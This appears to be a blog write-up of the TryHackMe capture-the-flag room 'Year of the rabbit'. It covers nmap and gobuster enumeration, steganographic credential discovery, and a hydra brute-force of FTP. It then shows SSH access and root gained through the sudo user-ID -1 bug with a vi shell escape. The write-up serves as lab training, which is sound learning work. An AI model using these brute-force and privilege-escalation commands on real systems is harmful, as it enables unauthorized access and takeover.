CatSec.org

Year of the rabbit

In this post, we will look into the room “Year of the rabbit” from TryHackMe, which can be found on https://tryhackme.com

Port scanning

So as always let’s start with some port scanning:

nmap -sV -A $IP

Commands:

-A – aggressive scan – basically it runs scripts for common things so you can better understand what you can find useful and what is useless.

-sV – version detection – great for searching exploits related to that version of the running services

Now let’s see the output:

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-09 03:41 EDT
Nmap scan report for 10.10.250.190
Host is up (0.059s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA)
|   2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA)
|   256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA)
|_  256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519)
80/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.72 seconds

Anonymous ftp isn’t allowed so we will enumerate the webserver. We fire up gobuster with the following commands:

gobuster dir -u $IP -w /usr/share/wordlists/dirb/common.txt

Commands:

dir – set the mode to directory discovering/fuzzing

– u – used for url

-w the path to the wordlist

Now we need to wait for gobuster to fuze the webserver and then we can check the output:

2020/08/09 03:44:16 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.hta (Status: 403)
/assets (Status: 301)
/.htaccess (Status: 403)
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2020/08/09 03:44:44 Finished
===============================================================

No interesting directories so i went thru all of them manually just to see. Then in assets i found 2 interesting things:

The first one is the popular meme song “Never gonna give you up” but the style.css is the interesting part of this directory. When we open the file we see an interesting comment:

/* Nice to see someone checking the stylesheets.
     Take a look at the page: /**************.php
  */

When i opened the page i was redirected to youtube so i fired up burp to see what’s going on in the php file. For burp we need to first set the proxy in firefox. This can be done by going into Preferences > General (scroll to the bottom) > Network Settings > Advanced and then fill this information:

Then you just press OK and open up Burp. Now try to go into the php file and see the response:

GET /intermediary.php?hidden_directory=/******** HTTP/1.1
Host: 10.10.250.190
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

You can then switch back to no-proxy and go into the hidden directory. We see a png file that we can download from the webserver. We use the command:

wget http://$IP/*******/Hot_Babe.png

Now let’s first use strings for the image. We type:

strings Hot_Babe.png


And BOOM we can see there is a hidden message:

Eh, you've earned this. Username for FTP is ftpuser                                                                                                        
One of these is the password:

Then we can forward the output into a file so we can use hydra and bruteforce the ftp:

strings Hot_Babe.png > pass.txt

We open the pass.txt with mousepad so we can delete everything expect the passwords. Then we open hydra and type the following command:

hydra -l ftpuser -P pass.txt ftp://$IP

And voila we got the password now we can login. We see a file named Eli’s_Creds.txt that we can download. We use the command “get” and the filename. Then when i used cat to see the file i was amazed by this. *i’m pasting part of the content of the file*:

+++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->-
--<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+
++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+
+++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++<
]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+

So i just pasted it in google and found that this is brainfuck language. So i used a website to decrypt it and BOOM we have a username and password. Now we can use this info for ssh.

We see a message from gwendoline about a s3cr3t directory. We can use the command “locate” to find it.

locate s3cr3t

#output
/usr/games/s3cr3t
/usr/games/s3cr3t/.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!
/var/www/html/sup3r_s3cr3t_fl4g.php

Okay so now we can go and cat the secret message. When we do this we see gwendoline’s password that we can use to ssh with. Let’s do this. Now we can cat the user.txt flag and paste it in tryhackme.

For the root i tried with sudo -l to see what we can do and i saw that vi can be used but not with the gtfobins commands. So then i found a sudo bug that if you specify a user that doesn’t exit it gives you root. Idk why it’s working like that but let’s try this. We type:

sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt

Vi will open so we need to press “:” and then type “!/bin/sh” and voila we got root. Now we can cat the root.txt file.